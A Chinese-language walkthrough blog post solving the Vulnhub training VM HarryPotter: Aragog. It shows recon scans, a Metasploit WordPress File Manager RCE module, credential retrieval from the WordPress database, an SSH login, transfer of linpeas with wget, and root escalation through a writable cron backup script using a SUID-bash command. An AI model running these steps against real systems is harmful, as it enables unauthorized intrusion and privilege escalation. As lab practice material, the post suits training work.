看完这篇 教你玩转渗透测试靶机Vulnhub——HarryPotter:Aragog(1.0.2)

简介: 看完这篇 教你玩转渗透测试靶机Vulnhub——HarryPotter:Aragog(1.0.2)

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。


PS:这个是HarryPotter(哈利波特)系列一共有三个靶机,先来第一个Aragog老样子需要获得root权限找到flag(这里是魂器)即可。



image.png

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/harrypotter/Aragog-1.0.2.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。

Vulnhub靶机漏洞详解:


①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机



渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.103

使用命令:nmap -sS -sV -A -n -p- 192.168.0.103



发现开启了2280端口,先访问一下哈利波特(经典再现)🆗还是老样子dirb、dirsearch、whatweb、gobuster、nikto



这里我们扫到了一堆/blog/子目录还有后台一看就是WordPress的cms的框架🆗 这里可以使用一个工具 wpscan


②:漏洞发现:

WPScan是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等,Kali Linux默认自带了WPScan 可以-h查看具体用法参数

wpscan --api-token=自己的值 --url=http://192.168.0.103/blog -e vp  #记得自己注册个账号拿api-token的值 不然扫描不会显示漏洞信息的



cb1dd3c97de04bf3b527e3e14355d2e8.png

其实就有关于file Manager的 我们可以使用MSF去测试一下

③:漏洞利用:
search wordpress file manager #搜索manager相关漏洞信息
use  exploit/multi/http/wp_file_manager_rce #使用模块
show options  #查看需要的设置的参数
set RHOST 192.168.0.103  #设置靶机ip
set LHOST 192.168.0.105   #设置本地ip
set payload  #可以设置 可以不设
set TARGETURI /blog
run  #运行即可


5b59e523dd504fc58bfe9e207d0f4845.png

8bbb7051697c46c8877e7206caca4f31.png

🆗这里就渗透进来了,在/home 下面的 hagrid98文件下发现第一个魂器base64解码即可。



④:数据库语句查询:

🆗这里我们找到了第一个魂器 使用 getuid 发现权限比较低 这里我们的思路就是需要提权操作了!


思路:wordpress用户会在mysql数据库中存储信息,在/etc/wordpress里可以打开config-default.php


得到账号和密码:root/mySecr3tPass

python3 -c 'import pty; pty.spawn("bin.bash");'  #开启交互
mysql -u root -p  #登入数据库
show databases;  #列出库
use wordpress;  #使用wordpress库
show tables;  #查询表
select * from wp_users; #查询表内容


5331ec5d7d724559a8157b402ffab083.png



ad7d459171944552849b670a40f795bb.png

286b3a2a4b9c43b6ac04b7679326c90b.png

81cb12bba33c425d8a861eb578688b26.png


然后MD5解码得到密码:password123

MD5在线解密:https://www.somd5.com/


⑤:SSH登入:

得到了账号密码:hagrid98/password123 尝试登入,登入成功!!!


⑥:备份文件提权:

这里需要下载 linpeas.sh 用于辅助提权的开启临时网页:python3 -m http.server 9000 在使用wget下载到靶机

linpeas.sh下载地址:https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

wget http://192.168.0.105:9000/linpeas.sh  #wget 下载到靶机
chmod 777 linpeas.sh # 给个权限
./linpeas.sh #运行 进行扫描

54a907335c094ab7a5e0805ffa1e73df.png


d67140bdd42b4ae1bdf15623d8a96fef.png

扫描发现有backup备份文件,这个脚本的意思就是把上传的文件复制到/tmp 然后过段时间会执行。


这里可以继续传pspy64用来看定时任务的(我懒得传了,大晚上肝文章要睡觉着了)直接为可以执行bash就行了

chmod +s /usr/bin/bash #给个权限
/usr/bin/bash -p  #执行bash


⑦:获取FLAG:



base64解码即可。



剩下得魂器 下次探索吧!已经凌晨 20分钟了 狗命要紧!!

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:


这个靶机难度高,主要i是最后得提权吧


1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf等

2.数据库的基本操作 查询语句 select * from python3开启交互 以及开临时网页(最基本的讲过很多次了)

3.wpscan工具的使用 探测WordPress 框架

4.MSF框架:exploit/multi/http/wp_file_manager_rce的使用

5.linpeas.sh辅助提权的使用,查询定时任务pspy64 备份文件提权


HarryPotter系列第一个靶机,学习到了很多知识点又是收获满满的一天(耶耶耶!)

最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
9天前
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
24 0
|
9天前
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
3 0
|
9天前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
15 0
|
9天前
|
Shell Linux 网络安全
基于Vulnhub—DC8靶场渗透测试过程
这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码
7 0
|
9天前
|
安全 Shell 网络安全
基于Vulnhub靶场之DC-3渗透测试过程
Vulhub靶场介绍: [Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境,帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括: 1. **丰富的漏洞场景**:覆盖多种常见的漏洞,如SQL注入、XSS等。 2. **详细复现指南**:为每个漏洞场景提供详细的环境搭建和利用步骤,便于学习和实践。 3. **易于使用**:提供一键部署或Docker镜像,简化环境搭建过程 4. **持续更新与维护**:项目在GitHub上开源,不断接收社区的贡献和更新
27 0
|
7月前
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
156 0
|
7月前
|
安全 Oracle Shell
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
70 0
|
7月前
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
70 0
|
8月前
|
安全 Linux 测试技术
如何使用Kali Linux进行渗透测试?
如何使用Kali Linux进行渗透测试?
270 0
|
4月前
|
网络协议 网络安全 Go
Kali下安装渗透测试常用工具dnsx和dirsearch
Kali下安装渗透测试常用工具dnsx和dirsearch
115 0

热门文章

最新文章